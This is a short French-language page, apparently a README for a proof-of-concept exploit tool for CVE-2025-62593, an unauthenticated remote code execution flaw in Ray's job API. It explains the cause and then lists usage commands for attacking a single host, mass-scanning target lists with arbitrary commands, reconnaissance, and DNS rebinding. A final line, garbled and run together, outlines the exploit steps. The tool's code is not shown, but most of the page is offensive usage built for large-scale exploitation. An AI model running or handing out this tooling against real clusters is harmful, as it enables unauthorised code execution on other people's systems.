
CVE-2025-62593 — Ray Unauthenticated RCE Exploit est une vulnérabilité d'exécution de code à distance non authentifiée dans le moteur de calcul distribué pour l'IA Ray.
CVE-2025-62593 est une vulnérabilité d'exécution de code à distance non authentifiée
dans le moteur de calcul distribué IA Ray. La cause racine est l'absence
d'authentification sur des points de terminaison HTTP critiques (/api/jobs, /api/job_agent/jobs).
Un attaquant peut soumettre un Job Ray dont le point d'entrée est une commande arbitraire,
l'exécutant sur le nœud principal du cluster.
# Cible unique
python3 ray_rce_poc.py --target http://HOST:8265
# Analyse de masse (10 concurrents)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# Mode reconnaissance (énumération rapide)
python3 ray_rce_poc.py --recon --targets list.txt
# Mode rebinding DNS
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# Analyse avec liste de mots
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
/api/jobs/ avec un point d'entrée exécutant la commande cible/api/jobs/ jusqu'à ce que le job atteigne un état terminal/api/jobs/{id}/logs pour récupérer la sortie